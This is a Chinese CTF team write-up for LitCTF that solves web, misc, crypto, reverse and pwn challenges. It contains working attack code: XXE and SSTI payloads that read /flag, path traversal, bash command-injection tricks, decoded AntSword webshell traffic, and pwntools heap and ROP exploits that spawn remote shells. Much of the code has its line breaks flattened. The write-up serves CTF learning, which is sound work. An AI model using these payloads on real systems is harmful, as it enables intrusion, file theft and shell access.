litctf wp

第一次ak了web和misc，非常激动，感谢lictf给我这个机会

最终成果

全靠队里的密码逆向✌带飞。一个人就砍了近一半的分数

这里是我们队的wp

web

exx

题目名反过来就是xxe，考察xxe，查看登录的数据包

发现传的就是xml数据，没过滤啥，基础的payload就出了

import requests
port=28926
username='&xxe;'
data=f"""<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>{username}</username><password>123456</password></user>"""
url=f'http://node2.anna.nssctf.cn:{port}/doLogin.php'
res=requests.post(url=url,data=data)
print(res.text)

一个池子?

打开环境，看到回声两个字，就猜到是ssti，输入{{3*5}},

果然就是，本来还想fuzz一下黑名单，联想到xxe没有过滤，用基础payload也是一下就出了

{{lipsum.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}

SAS

没啥好说，按照他给的代码，写出base64后的对应的序列化数据即可，考反序列化至少也得搞个pop链吧。。。

exp

<?php
class User
{public $username='admin';public $password='secure_password';}
echo base64_encode(serialize(new User()));

浏览器也能套娃？

提示输入url，输入个百度的网址，回显了个百度的页面，就是考ssrf，也是没啥过滤，file协议就出了

file:///flag

背景查看器

一开始有个文件包含的提示代码，搞得我以为传url参数，结果没反应，后面发现有个改变主题的按钮，按下后有发送请求

所以参数是这个theme，也是没啥过滤，首页的代码提示是唬人的，直接目录穿越包含根目录的flag即可

exp

import requests
url='http://node1.anna.nssctf.cn:28117/'
file='../../../../../flag'
data={'theme':file}
res=requests.post(url=url,data=data)
print(res.text)

百万美元

源码

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
$c = $_GET['c'];
if ($a !== $b && md5($a) == md5($b)) {if (!is_numeric($c) && $c > 2024) {echo "好康的";} else {die("干巴爹干巴爹先辈~");}}
else {die("开胃小菜))");
}

a 和b很明显传个md5是0e的就行，c传2025a即可，字符串和数字比较会转为数字，2025a转为2025

payload

?a=MMHUWUV&b=MAUXXQC&c=2025a

来到dollar.php

?php
//flag in 12.php
error_reporting(0);
if(isset($_GET['x'])){$x = $_GET['x'];if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){system("cat ".$x.".php");}
}else{highlight_file(__FILE__);
}
?>

ban掉了数字字母，还要构造出12，利用$(())构造出来0 ，取反一下$((~$(())))构造-1，然后把后面多个$((~$(())))像字符串一样拼在一起，shell执行就做减法运算，减到-13，再取反到12即可，

具体原理可看探机的bash-fuck项目

https://github.com/ProbiusOfficial/bashFuck?tab=readme-ov-file

还有这个大佬的文章也可以看一下

https://xz.aliyun.com/t/12242

payload

?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

misc

贪恋每分每秒

提示很明显了，laosebi 就是lsb，跑个随波逐流即可出flag

你说的对，但

一开始解压出来的二维码，扫一下转到了云原神，

发现二维码图片里有藏压缩包，foremost提取出来，解压一下发现是一个二维码被拆成了4个部分，还是用随波逐流，方形合并一下得到完整二维码图片，

扫一下就出了flag

LitCTF{Genshin_St@rt!!}

原铁启动

给了个图片

身为前原神和现星铁玩家，一下字认出了这是原神和星铁里的文字，网上找个对照表就可以出flag

原神：【图研所】提瓦特现行文字对照表-原神社区-米游社 (miyoushe.com) 通用文

星铁：【1.0版本考据】历时两个半月！铁道文字翻译！-原神社区-米游社 (miyoushe.com)，

记得换flag头和转小写

LitCTF{good_gamer}

Everywhere we go

就给了一个wav，播放时感觉没啥问题，但我舍友听到了说感觉很奇怪，和原曲差别有点大，可能里面还是藏了东西，尝试用advacity，把采样率改小一点，这里用了1500，打开频谱图，就能看到中间有个flag

盯帧珍珠

乍一看是个丁真图片，一打开马上又变成其他的，用stegsolve把每一帧固定住，每帧找一下就能出flag

flag

LitCTF{You_are_really_staring_at_frames!}

舔到最后应有尽有

一打开，是一大堆base64字符串，感觉是base64隐写，puzzlesolver一把梭即可

LitCTF{TanJi_j1e_jie_n1_dAi_w0_z0u_b_}

太关键了

根据题目名，还有压缩包里的文件名，猜出这是关键词加密，题目提示某些字符频率很高，对keyword.txt里的东西进行词频分析即可出关键词bingo

然后关键词解密即可

LITCTF{i_miss_you_boss}

女装照流量

流量分析，因为只会看http，所以直接看

看到跟/uplaod/ma.php有很多交互，看看在干什么，找了最后一个来看

请求是一段很长的php代码，像是蚁剑流量，应答很明显是一个压缩包数据，里面有flag.php，把php代码url解码，格式化一下，得到很长一串，关键部分如下

$F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($_POST["p2a4445380b252"]) : $_POST["p2a4445380b252"], 2));$fp = @fopen($F, "r");if (@fgetc($fp)) {@fclose($fp);@readfile($F);} else {echo("ERROR:// Can Not Read");}

$F应该就是一个文件的路径，然后readfile读取，根据响应包的内容，这应该是读取压缩包内容的，于是把响应包压缩包内容导出来，解压发现需要密码，

然后就往上继续查看ma.php的请求和应答，看到这个时发现

关键词，adding ，stored，明显是压缩flag.php的命令的回显，所以请求的包一定是压缩的命令，其中应该有密码

于是，把上一个请求的9783流量包的php代码导出来，格式化，得到关键部分如下

$p = base64_decode(substr($_POST["da8af99c22690c"], 2));
$s = base64_decode(substr($_POST["j6d5aaa1b7e5ac"], 2));

然后代码中运行rce用到了p，post的da8af99c22690c参数应该就是命令，解码一下

得到密码，解压即可得到flag

the love

解压有个图片和wav，wav听起来挺正常的

发现图片中有一个压缩包，分离出来，继续解压发现是真加密，需要密码，一开始爆破了全数字失败，然后010查看图片时发现

很明显是掩码攻击，apchr跑一下就出了，中间缺失的是202405

压缩包解压后有个假flag，还有一个password.txt，里面的两遍base64后，是

带密钥的音频隐写，尝试deepsound工具，就出了flag

---

Crypto

small_e

低指数攻击，n很大，直接开三次方即可

from Crypto.Util.number import *
import mathc_list = [...]def cubic_root_to_ascii(numbers):ascii_chars = []for num in numbers:for i in range(0, 200):if i**3 == num:ascii_chars.append(chr(i))return ascii_charsascii_result = cubic_root_to_ascii(c_list)
print("".join(ascii_result))

small_e_plus

指数依旧比较小，而且可以猜测前几位明文是 LitCTF
爆破出指数，然后解密即可

n = 26287684934288536371438030224508784042871268975402791015134838900290249602701092702492594931306572692868654436714501196060619149020850402317982203575250568283872182497606239389480186694649979877566740647822434500023605871516831662099415987589808614777313595453727243531121031390104059097782466650186291076316486240197369759537327997880644540629964227584070506981319936888159712058406052247256554081989035415864476278146328967410452695134756792942103209740186339835071828587981271027235499355298543650516643100665039796305276163706693873611519506528344413021878980171629732211592839945004800782325172828561339662590291c_list = [...]c1 = ord("L")c = 2206795524649235905421691489826312664535869158473992241382107452229902627430789178221234450699214518235612692491501082306158268745610575202210170312762929300421312081998256557805289595256913161318967687803957784191522197708618872099119883772100567610799038030170491575261415069363292331223848994909959222662307903914818692008641789258455591462146141825906954662346647872459477376830019604449386735009274664469596162731339288162705222622464022019805917855614180415135305122287341306358535204977475464107550060171378721195970927993762052901722822033817371589592984818877687488499315074761849162622037910992107211284008for i in range(1000, 2000):if ((c1**i) % n) == c:print(i)breake = 1924ascii_chars = []
for num in c_list:for i in range(0, 200):if ((i**e) % n) == num:ascii_chars.append(chr(i))continue
print("".join(ascii_chars))

真签到

依旧是爆破指数，然后解密

c1 = ord("L")
c = 4124398080749553074619843072966405052653858760437326718059791703345965920503569739252697039258403095781261373084359291436131778873009458422798167842256401087702314540530419434366776728534830888673974354635857270349385440098865230210094489169761588857916363734220665484295067349289289937219722492065728599463
n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891for i in range(2, 10**8):if pow(c1, i, n) == c:print(i)

这里得到 e = 9897777

n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891
e = 9897777
c = [...]ascii_chars = []
for num in c:for i in range(0, 200):if pow(i, e, n) == num:ascii_chars.append(chr(i))continue
print("".join(ascii_chars))

polynomlal

直接算出pqr，解就完事了

from sympy import symbols, Eq, solve
from Crypto.Util.number import inverse, long_to_bytesPolynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832p, q, r = symbols("p q r", integer=True)eq1 = Eq(p**2 + q, Polynomial1)
eq2 = Eq(q**2 + r, Polynomial2)
eq3 = Eq(r**2 + p, Polynomial3)
solutions = solve((eq1, eq2, eq3), (p, q, r))if solutions:p, q, r = solutions[0]print(p)print(q)print(r)import libnum
import gmpy2
e = 65537
p = 7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q = 13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r = 9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
n = p * q * r
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900phi_n = (p - 1) * (q - 1) * (r - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

polynomial_plus

升级版多项式，本来是直接用python解多项式方程的，但是跑了半天没跑出来
后来想到用二分查找 k，每次计算区间中间的数与 n 比较，判断是左右哪个区间，一下搞定

from Crypto.Util.number import *def calculate_p_q(k):p = k**10 + 22 * k**8 + 53 * k**6 - 22 * k**4 - 39 * k**2 + 114514q = k**9 + 10 * k**7 - 13 * k**6 - 2 * k**4 + 111 * k**2 + 1919810return p, qdef binary_search(n):low = 0high = 2**65while low <= high:mid = (low + high) // 2p, q = calculate_p_q(mid)if p * q == n:return midelif p * q < n:low = mid + 1else:high = mid - 1return Nonee = 65537
n = 343424787688946710828788193478518340184635630498236346907606509763011890082198311173501834898393322176325060349656021994088578448585570427399686920253145504431065451412326430233084073651599248661762036671841142048573051549474182586297565046285161375600990596119448538118327240405957845178956427810835797220204485242640945891970398041508724313442375608608662117158013
c = 300097152084696274516003269451037367405899874736667089358316145472977115856239312841307278390995620995063953407731245808077915106161525019835875978698148238617148929170257141762407514139479267867121064342168993486529889088067645866930029787500052390195406519896658384623575160091828173111087120708969655686251340535134778177193882787257773427670338018428731395437974k = binary_search(n)
p, q = calculate_p_q(k)
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)print(long_to_bytes(m))

真easyRSA

刚开始看到题目中有 print(p) print(c)，但是输出里没有 p，却有 c1 c2 想不明白
后面重新试着解了一下，原来是有两段

from Crypto.Util.number import *
import gmpy2
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
p = gmpy2.iroot(n, 4)[0]
q = p**3
e = 65537
d = inverse(e, p**3 * (p - 1))
c1 = 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2 = 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219print(long_to_bytes(pow(c1, d, n)))
# LitCTF{HeRe_1s_Weak_F1aG}hahahaha_____hint_is_93492332457019255141294502555555489582661562346262162342211605562996217352449
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
n = p * q
d = inverse(e, (p - 1) * (q - 1))
print(long_to_bytes(pow(c2, d, n)))
# LitCTF{R1ght_Answ3r!}

common_primes

n1，n2 有公因数 p，得到 p 求解即可

from Crypto.Util.number import *e = 65537
n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420p = GCD(n1, n2)
q = n1 // p
phi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c1, d, n1)
print(long_to_bytes(m))

common_primes_plus

复杂一点的式子，观察一下发现 hint1，hint2 依旧有公因数 p

from Crypto.Util.number import *
n1 = 72619153900682160072296441595808393095979917106156741746523649725579328293061366133340736822282117284050717527134297532031234706715551253283030119063143935874516054785948327252045453986903379262257406260016876625891582923191913450785482873961282498295762698500898694660964018533698142756095427829906473038053
hint1 = 115150932086321440397498980975794957800400136337062771258224890596200580556053305338941267789684878816176014493153795643655219028833232337281425177163963414534998897852644398384446019097451620742463880027107068960452304016955877225140421899265978792650445328111566277376529454404089066088845864500514742797060500618255170627
hint2 = 166820160267525807953634213157298160399912450930658918773153592459310847514047652216110562360456335336533080444219104489314586122760398361430693763814336759476811490524054588094610387417965626546375189720748660483054863693527537614055954695966458622029711055735399842018236940424665041143785192280089418185085532002136215976
c = 28378912671104261862184597375842174085651209464660064937481961814538145807266472966765374317717522401362019901110151858589886717440587644003368826809403188935808872400614919296641885383025657934630410406898092262104442977722339379234085663757182028529198392480656965957860644395092769333414671609962801212632e = 65537
p = GCD(hint1, hint2)
q = n1 // p
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n1)
print(long_to_bytes(m))

CRT

观察了一下，发现 c_list 中的值都是一样的，说明 e=10 指数较小，直接求 c 的 10 次方根即可

from Crypto.Util.number import *
import gmpy2
c = 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049
m = gmpy2.iroot(c, 10)[0]
print(long_to_bytes(m))

little_fermat

p，q 相近，求解 n 的平方根，找相近即可
另外 x 是费马小定理的形式， x = q - 1

from Crypto.Util.number import *
import gmpy2e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:p = n // rootif p * root == n:q = rootbreakroot = root - 1d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
m = m ^ (q - 1)
print(long_to_bytes(m))

little_fermat_plus

x 变成了 n 倍的 x，爆破一下就行

from Crypto.Util.number import *
import gmpy2e = 65537
n = 169522900072954416356051647146585827691225327527086797334523482640452305793443986277933900273961829438217255938808371865341750200444086653241610669340348513884285892043530862971785487294831341653909852543469963032532560079879299447677636753647721541724969084825510405349373420839032990681851700075554428485967
c = 105943762023156641770119141175498496686312095002592803768522760959533958364969985856505466722378959991757667341747887520146437729810252085791886309974903778546814812093444837674447485802109225767800488527376777153844313243366001288246744190001997192598159277512188417272938455513900277907186067996704043274199root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:p = n // rootif p * root == n:q = rootbreakroot = root - 1d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(m)for i in range(10000):am = m ^ (i * (q - 1))flag = long_to_bytes(am)if b"LitCTF" in flag:print(flag)break

Reverse

编码喵

看到主程序 base64 加密，然后看字符串
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=
经典换表 base64

ezpython

python逆向题，用 pyinstxtractor 反编译，然后高版本的 python 无法用本地的 uncompyle6，上网找了个工具

又是换表base64
8kuWYm=1JiUPs7DT4x+X5tcqZKfGvA0gFLB6y3QbV2rNOlRdMwnEohjzSe9/HIa-
X=3o4hx=0EZwf=mMv13gX=3o4hx=qje2ZjtgZQmEKXZog4==

ezrc4

动态调试得到 key = litctf!
用 python 解密即可，注意字符串的大小端转换

def rc4_init(key):s = list(range(256))j = 0k = [key[i % len(key)] for i in range(256)]for i in range(256):j = (j + s[i] + k[i]) % 256s[i], s[j] = s[j], s[i]return sdef rc4_crypt(data, key):s = rc4_init(key)i = j = 0out = bytearray()for byte in data:i = (i + 1) % 256j = (j + s[i]) % 256s[i], s[j] = s[j], s[i]t = (s[i] + s[j]) % 256out.append(byte ^ s[t])return outkey = b"litctf!"
data = bytearray([0xD5,0xB2,0x7C,0xDC,0x90,0xA2,0x6E,0x60,0x06,0x13,0xE4,0x71,0x59,0xB0,0x90,0x31,0xB2,0xC7,0x1D,0xD7,0x7F,]
)
decrypted_data = rc4_crypt(data, key)
print(decrypted_data.decode("utf-8"))

得到 LitCTF{rc4_love_nice}

Pwn

不得不说，分配的相当清晰，从2.23的fastbin到2.27的tcache bin再到2.31的tcache bin key以及2.35和2.39的IO。从易到难，不过，不得不说，还是警醒我学IO，因为，不会IO，对着例题看了2.35瞪了一下午打不通的眼[躺]，对了，加了一道小rop，不过重点在于溢出理解，没有很高的知识要求

heap-2.23

UAF后，可以轻易泄漏出libc基址，然后再通过fastbin attack直接写malloc_hook为one_gadget就行

from pwn import *libc = ELF("./libc.so.6")\# elf = ELF("./heap")\# libc = elf.libc\# io = process("./heap")io = remote("node2.anna.nssctf.cn", 28852)context(arch = 'amd64', os='linux', terminal='kitty')\# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):​     io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'content :', content)​    def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x90)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')malloc_hook = u64(io.recv(6).ljust(8, b'\x00')) - 88 - 0x10lg("malloc_hook", malloc_hook)libcbase = malloc_hook - libc.sym['__malloc_hook']lg("libcbase", libcbase)realloc = libcbase + libc.sym['realloc']lg("realloc", realloc)l_gadget = [0x4525a, 0xef9f4, 0xf0897]r_gadget = [0x4527a, 0xf03a4, 0xf1247]one_gadget = libcbase + r_gadget[2]lg("one_gadget", one_gadget)alloc(2, 0x68)delete(2)edit(2, p64(malloc_hook - 0x23))alloc(3, 0x68)alloc(4, 0x68)edit(4, b'A'*0xb + p64(one_gadget) + p64(realloc + 0x8))alloc(5, 0x68)io.interactive()dbg()

heap-2.27

同样的UAF，泄漏后直接tcache double free，写free_hook为system地址，然后free掉包含/bin/sh\x00的堆块就行

from pwn import *libc = ELF("./libc.so.6")\# elf = ELF("./heap")\# libc = elf.libc\# io = process("./heap")io = remote("node1.anna.nssctf.cn", 28709)context(arch = 'amd64', os='linux', terminal='kitty')\# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendafter(b'content :', content)​    def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x410)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']lg("libcbase", libcbase)free_hook = libcbase + libc.sym['__free_hook']lg("free_hook", free_hook)l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]one_gadget = libcbase + l_gadget[0]lg("one_gadget", one_gadget)system = libcbase + libc.sym['system']
lg("system", system)alloc(2, 0x18)delete(2)edit(2, p64(free_hook))alloc(3, 0x18)
alloc(4, 0x18)
edit(3, b'/bin/sh\x00')edit(4, p64(system))delete(3)io.interactive()dbg()

heap-2.31

UAF再次出击，不仅可以泄漏，还可以清除掉tcache bin检查用的key，然后再次写free_hook（小记一个，2.32才有tcache bin的fd指针加密，我竟然花了十分钟才反应过来，第一个tcache里确实有一个加密用的地址，但是好像没用上，翻笔记才发现2.32才有这机制。。。）

from pwn import *# libc = ELF("./libc.so.6")elf = ELF("./heap")libc = elf.libcio = process("./heap")# io = remote("node1.anna.nssctf.cn", 28144)context(arch = 'amd64', os='linux', terminal='kitty')# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):​     io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendafter(b'content :', content)​    def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x410)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']lg("libcbase", libcbase)free_hook = libcbase + libc.sym['__free_hook']lg("free_hook", free_hook)l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]one_gadget = libcbase + l_gadget[0]lg("one_gadget", one_gadget)system = libcbase + libc.sym['system']lg("system", system)alloc(2, 0x80)delete(2)delete(2)edit(2, p64(free_hook))alloc(4, 0x80)alloc(5, 0x80)edit(5, p64(system))gdb.attach(io)alloc(6, 0x10)edit(6, b'/bin/sh\x00')delete(6)io.interactive()dbg()

atm

其实蛮有意思，给了200的溢出距离，但是实际上给了修改函数，3可以增多，2可以减少，不过没用上2，直接不停的给3加0x200（实际上能溢出写进pop_rdi_ret，binsh，ret和system的地址就行了，但是直接就这么写了），只要有了足够长的溢出，就直接执行5泄漏后拿到binsh地址和system地址，然后正常rop，再记一下，有栈平衡问题，会卡住，要加个ret平衡栈，就这样

from pwn import *from LibcSearcher import *# io = process("./app")io = remote("node2.anna.nssctf.cn", 28651)elf = ELF("./app")libc = elf.libccontext.terminal = 'kitty'io.sendafter(b'password:', b'A'*0x10)main = elf.sym['main']asi = 1while asi:io.sendlineafter(b'4.Exit', b'3')io.sendlineafter(b'Please enter your deposit:', str(0x200).encode())io.sendlineafter(b'4.Exit', b'1')io.recvuntil(b'Your balance is:')asb = io.recvuntil(b'$', drop='True')if int(asb) > 0x200:​    asi = 0​    print(hex(int(asb)))io.sendlineafter(b'4.Exit', b'5')io.recvuntil(b'gift:')_addr = int(io.recvline()[:-1], 16)print(hex(_addr))libc = LibcSearcher('printf', _addr)libcbase = _addr - libc.dump('printf')# libcbase = _addr - libc.sym['printf']print(hex(libcbase))system = libcbase + libc.dump('system')binsh = libcbase + libc.dump('str_bin_sh')# system = libcbase + libc.sym['system']# binsh = libcbase + next(libc.search('/bin/sh'))print(hex(system))print(hex(binsh))pop_rdi_ret = 0x0000000000401233io.sendline(b'A'*(0x160+8) + p64(pop_rdi_ret) + p64(binsh) + p64(0x000000000040101a) + p64(system) + p64(main))# gdb.attach(io)io.sendlineafter(b'4.Exit', b'4')io.interactive()